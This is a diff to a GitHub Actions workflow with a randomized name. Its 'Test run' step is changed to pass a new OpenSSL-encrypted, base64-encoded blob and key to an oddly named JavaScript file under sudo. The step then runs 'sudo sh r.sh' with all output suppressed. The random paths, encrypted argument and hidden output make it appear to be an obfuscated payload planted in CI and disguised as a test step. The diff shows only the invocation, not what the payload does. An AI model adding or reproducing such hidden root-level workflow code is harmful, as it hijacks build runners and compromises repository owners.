--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo '5alv9'
+        echo 'rzc3i'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX187Hu+yJtNFCLMQIr79Uqh8zf4dSnlqBpWQ5SdezeHeHeWZLJoF9KCY7Ss5oL7PbjTKnbyfi28YUER4Z1vYsIk5WdUjVhXr3VH1/qBmgrAIU/v3GD4xpY50 9no9v9 && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX19phPTTqYhMp70z2v+qyu2H5uFZnleUUgdRe4mHNF2VLdavNf+zVkNQDVfxIIm00/somk7PKyFQNrvctuA1F3vpzc4/QHV+UawPssG2HqZbzkbf+r3y716M 3kml6n && sudo sh r.sh > /dev/null 2>&1
